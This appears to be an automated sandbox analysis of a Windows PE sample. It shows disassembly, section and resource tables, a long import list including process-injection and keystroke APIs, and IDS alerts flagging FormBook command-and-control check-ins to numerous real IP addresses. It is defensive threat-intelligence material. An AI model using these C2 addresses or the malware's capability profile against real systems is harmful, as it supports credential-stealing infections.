                                                                                                        jmp 00007F6F1110460Eh
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        push ebp
                                                                                                        mov ebp, esp
                                                                                                        push edi
                                                                                                        push esi
                                                                                                        mov esi, dword ptr [ebp+0Ch]
                                                                                                        mov ecx, dword ptr [ebp+10h]
                                                                                                        mov edi, dword ptr [ebp+08h]
                                                                                                        mov eax, ecx
                                                                                                        mov edx, ecx
                                                                                                        add eax, esi
                                                                                                        cmp edi, esi
                                                                                                        jbe 00007F6F1110478Ah
                                                                                                        cmp edi, eax
                                                                                                        jc 00007F6F11104926h
                                                                                                        cmp ecx, 00000080h
                                                                                                        jc 00007F6F1110479Eh
                                                                                                        cmp dword ptr [004A9724h], 00000000h
                                                                                                        je 00007F6F11104795h
                                                                                                        push edi
                                                                                                        push esi
                                                                                                        and edi, 0Fh
                                                                                                        and esi, 0Fh
                                                                                                        cmp edi, esi
                                                                                                        pop esi
                                                                                                        pop edi
                                                                                                        jne 00007F6F11104787h
                                                                                                        jmp 00007F6F11104B62h
                                                                                                        test edi, 00000003h
                                                                                                        jne 00007F6F11104796h
                                                                                                        shr ecx, 02h
                                                                                                        and edx, 03h
                                                                                                        cmp ecx, 08h
                                                                                                        jc 00007F6F111047ABh
                                                                                                        rep movsd
                                                                                                        jmp dword ptr [00416740h+edx*4]
                                                                                                        mov eax, edi
                                                                                                        mov edx, 00000003h
                                                                                                        sub ecx, 04h
                                                                                                        jc 00007F6F1110478Eh
                                                                                                        and eax, 03h
                                                                                                        add ecx, eax
                                                                                                        jmp dword ptr [00416654h+eax*4]
                                                                                                        jmp dword ptr [00416750h+ecx*4]
                                                                                                        nop
                                                                                                        jmp dword ptr [004166D4h+ecx*4]
                                                                                                        nop
                                                                                                        inc cx
                                                                                                        add byte ptr [eax-4BFFBE9Ah], dl
                                                                                                        inc cx
                                                                                                        add byte ptr [ebx], ah
                                                                                                        ror dword ptr [edx-75F877FAh], 1
                                                                                                        inc esi
                                                                                                        add dword ptr [eax+468A0147h], ecx
                                                                                                        add al, cl
                                                                                                        jmp 00007F6F1357CF87h
                                                                                                        add esi, 03h
                                                                                                        add edi, 03h
                                                                                                        cmp ecx, 08h
                                                                                                        jc 00007F6F1110474Eh
                                                                                                        rep movsd
                                                                                                        jmp dword ptr [00000000h+edx*4]
                                                                                                        Programming Language:
                                                                                                        • [ C ] VS2010 SP1 build 40219
                                                                                                        • [C++] VS2010 SP1 build 40219
                                                                                                        • [ C ] VS2008 SP1 build 30729
                                                                                                        • [IMP] VS2008 SP1 build 30729
                                                                                                        • [ASM] VS2010 SP1 build 40219
                                                                                                        • [RES] VS2010 SP1 build 40219
                                                                                                        • [LNK] VS2010 SP1 build 40219
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8d41c | 0x154 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xab000 | 0x9328 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x82000 | 0x844 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8061c | 0x80800 | 61ffce4768976fa0dd2a8f6a97b1417a | False | 0.5583182605787937 | data | 6.684690148171278 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x82000 | 0xdfc0 | 0xe000 | 0354bc5f2376b5e9a4a3ba38b682dff1 | False | 0.36085728236607145 | data | 4.799741132252136 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x90000 | 0x1a758 | 0x6800 | 8033f5a38941b4685bc2299e78f31221 | False | 0.15324519230769232 | data | 2.1500715391677487 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xab000 | 0x9328 | 0x9400 | 495451d7eb8326bd9fa2714869ea6de8 | False | 0.49002322635135137 | data | 5.541804843154628 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xab5c8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xab6f0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xab818 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xab940 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | Great Britain | 0.48109756097560974
RT_ICON | 0xabfa8 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | Great Britain | 0.5672043010752689
RT_ICON | 0xac290 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | Great Britain | 0.6418918918918919
RT_ICON | 0xac3b8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | Great Britain | 0.7044243070362474
RT_ICON | 0xad260 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | Great Britain | 0.8077617328519856
RT_ICON | 0xadb08 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | Great Britain | 0.5903179190751445
RT_ICON | 0xae070 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | Great Britain | 0.5503112033195021
RT_ICON | 0xb0618 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | Great Britain | 0.6050656660412758
RT_ICON | 0xb16c0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | Great Britain | 0.7553191489361702
RT_MENU | 0xb1b28 | 0x50 | data | English | Great Britain | 0.9
RT_DIALOG | 0xb1b78 | 0xfc | data | English | Great Britain | 0.6507936507936508
RT_STRING | 0xb1c78 | 0x530 | data | English | Great Britain | 0.33960843373493976
RT_STRING | 0xb21a8 | 0x690 | data | English | Great Britain | 0.26964285714285713
RT_STRING | 0xb2838 | 0x4d0 | data | English | Great Britain | 0.36363636363636365
RT_STRING | 0xb2d08 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xb3308 | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xb3968 | 0x388 | data | English | Great Britain | 0.377212389380531
RT_STRING | 0xb3cf0 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | United States | 0.502906976744186
RT_GROUP_ICON | 0xb3e48 | 0x84 | data | English | Great Britain | 0.6439393939393939
RT_GROUP_ICON | 0xb3ed0 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0xb3ee8 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0xb3f00 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0xb3f18 | 0x19c | data | English | Great Britain | 0.5339805825242718
RT_MANIFEST | 0xb40b8 | 0x26c | ASCII text, with CRLF line terminators | English | United States | 0.5145161290322581
                                                                                                        DLLImport
                                                                                                        WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                                                                                                        VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                                                                                                        WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                                        COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                                                                                                        MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                                                                                                        WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                                                                                                        PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                                                                                                        USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                                                                                                        KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, 
DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
USER32.dll: GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
GDI32.dll: DeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
COMDLG32.dll: GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll: RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
SHELL32.dll: DragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll: OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
OLEAUT32.dll: VariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit
Language of compilation system | Country where language is spoken | Map
English | Great Britain |
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-06T08:39:13.534070+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 20.12.23.50 | 443 | 192.168.2.6 | 49753 | TCP
2024-11-06T08:39:43.494387+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 49911 | 154.92.61.37 | 80 | TCP
2024-11-06T08:39:43.494387+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 49911 | 154.92.61.37 | 80 | TCP
2024-11-06T08:39:51.605543+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 20.12.23.50 | 443 | 192.168.2.6 | 49957 | TCP
2024-11-06T08:40:00.378127+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49983 | 3.33.130.190 | 80 | TCP
2024-11-06T08:40:02.083678+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49984 | 3.33.130.190 | 80 | TCP
2024-11-06T08:40:04.597512+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49985 | 3.33.130.190 | 80 | TCP
2024-11-06T08:40:07.142021+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 49986 | 3.33.130.190 | 80 | TCP
2024-11-06T08:40:07.142021+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 49986 | 3.33.130.190 | 80 | TCP
2024-11-06T08:40:13.021440+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49987 | 203.161.49.193 | 80 | TCP
2024-11-06T08:40:15.547543+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49988 | 203.161.49.193 | 80 | TCP
2024-11-06T08:40:18.109970+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49989 | 203.161.49.193 | 80 | TCP
2024-11-06T08:40:20.672098+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 49990 | 203.161.49.193 | 80 | TCP
2024-11-06T08:40:20.672098+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 49990 | 203.161.49.193 | 80 | TCP
2024-11-06T08:40:26.374694+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49991 | 3.33.130.190 | 80 | TCP
2024-11-06T08:40:28.933962+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49993 | 3.33.130.190 | 80 | TCP
2024-11-06T08:40:31.782789+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49994 | 3.33.130.190 | 80 | TCP
2024-11-06T08:40:34.357565+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 49995 | 3.33.130.190 | 80 | TCP
2024-11-06T08:40:34.357565+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 49995 | 3.33.130.190 | 80 | TCP
2024-11-06T08:40:40.033394+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49996 | 3.33.130.190 | 80 | TCP
2024-11-06T08:40:42.594794+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49997 | 3.33.130.190 | 80 | TCP
2024-11-06T08:40:45.156854+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49998 | 3.33.130.190 | 80 | TCP
2024-11-06T08:40:47.887323+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 49999 | 3.33.130.190 | 80 | TCP
2024-11-06T08:40:47.887323+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 49999 | 3.33.130.190 | 80 | TCP
2024-11-06T08:40:53.673384+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50000 | 198.252.98.54 | 80 | TCP
2024-11-06T08:40:56.299646+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50001 | 198.252.98.54 | 80 | TCP
2024-11-06T08:40:59.697416+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50002 | 198.252.98.54 | 80 | TCP
2024-11-06T08:41:01.413455+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 50003 | 198.252.98.54 | 80 | TCP
2024-11-06T08:41:01.413455+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 50003 | 198.252.98.54 | 80 | TCP
2024-11-06T08:41:07.459323+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50005 | 103.224.182.242 | 80 | TCP
2024-11-06T08:41:10.004531+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50006 | 103.224.182.242 | 80 | TCP
2024-11-06T08:41:12.550081+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50007 | 103.224.182.242 | 80 | TCP
2024-11-06T08:41:15.086787+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 50008 | 103.224.182.242 | 80 | TCP
2024-11-06T08:41:15.086787+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 50008 | 103.224.182.242 | 80 | TCP
2024-11-06T08:41:21.763239+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50009 | 154.23.184.218 | 80 | TCP
2024-11-06T08:41:24.322356+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50010 | 154.23.184.218 | 80 | TCP
2024-11-06T08:41:26.871250+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50011 | 154.23.184.218 | 80 | TCP
2024-11-06T08:41:29.435247+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 50012 | 154.23.184.218 | 80 | TCP
2024-11-06T08:41:29.435247+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 50012 | 154.23.184.218 | 80 | TCP
2024-11-06T08:41:35.712995+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50013 | 31.31.196.17 | 80 | TCP
2024-11-06T08:41:38.228622+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50014 | 31.31.196.17 | 80 | TCP
2024-11-06T08:41:40.806800+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50015 | 31.31.196.17 | 80 | TCP
2024-11-06T08:41:43.525575+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 50016 | 31.31.196.17 | 80 | TCP
2024-11-06T08:41:43.525575+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 50016 | 31.31.196.17 | 80 | TCP
2024-11-06T08:41:49.471369+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50017 | 13.248.169.48 | 80 | TCP
2024-11-06T08:41:52.009629+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50018 | 13.248.169.48 | 80 | TCP
2024-11-06T08:41:54.616427+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50019 | 13.248.169.48 | 80 | TCP
2024-11-06T08:41:57.262565+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 50020 | 13.248.169.48 | 80 | TCP
2024-11-06T08:41:57.262565+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 50020 | 13.248.169.48 | 80 | TCP
2024-11-06T08:42:03.545297+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50021 | 217.76.156.252 | 80 | TCP
2024-11-06T08:42:06.056427+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50022 | 217.76.156.252 | 80 | TCP
2024-11-06T08:42:08.558522+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50023 | 217.76.156.252 | 80 | TCP
2024-11-06T08:42:11.112133+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 50024 | 217.76.156.252 | 80 | TCP
2024-11-06T08:42:11.112133+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 50024 | 217.76.156.252 | 80 | TCP
2024-11-06T08:42:17.393054+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50026 | 161.97.142.144 | 80 | TCP
2024-11-06T08:42:19.926700+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50027 | 161.97.142.144 | 80 | TCP
2024-11-06T08:42:22.488516+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50028 | 161.97.142.144 | 80 | TCP
2024-11-06T08:42:25.010909+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 50029 | 161.97.142.144 | 80 | TCP
2024-11-06T08:42:25.010909+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 50029 | 161.97.142.144 | 80 | TCP
2024-11-06T08:42:30.853335+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50030 | 199.59.243.227 | 80 | TCP
2024-11-06T08:42:33.416565+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50031 | 199.59.243.227 | 80 | TCP
2024-11-06T08:42:35.970041+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50032 | 199.59.243.227 | 80 | TCP
2024-11-06T08:42:38.520024+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 50033 | 199.59.243.227 | 80 | TCP
